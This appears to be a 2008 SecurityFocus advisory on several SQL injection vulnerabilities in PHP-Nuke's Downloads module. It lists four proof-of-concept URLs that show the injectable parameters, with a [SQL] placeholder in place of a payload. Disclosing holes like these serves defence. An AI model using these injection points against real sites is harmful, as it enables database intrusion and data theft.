Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHP-Nuke Downloads Module Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concepts are available:
http://www.example.com/[php-nuke]/modules.php?name=Downloads&d_op=Add&title=cXIb8O3&url=ma&description=POLSKA&email=',[SQL]
http://www.example.com/[php-nuke]/modules.php?name=Downloads&d_op=modifydownloadrequestS&url=',[SQL]
http://www.example.com/[php-nuke]/modules.php?name=Downloads&d_op=viewsdownload&min=[SQL]
http://www.example.com/[php-nuke]/modules.php?name=Downloads&d_op=search&min=[SQL]







 

Privacy Statement
Copyright 2008, SecurityFocus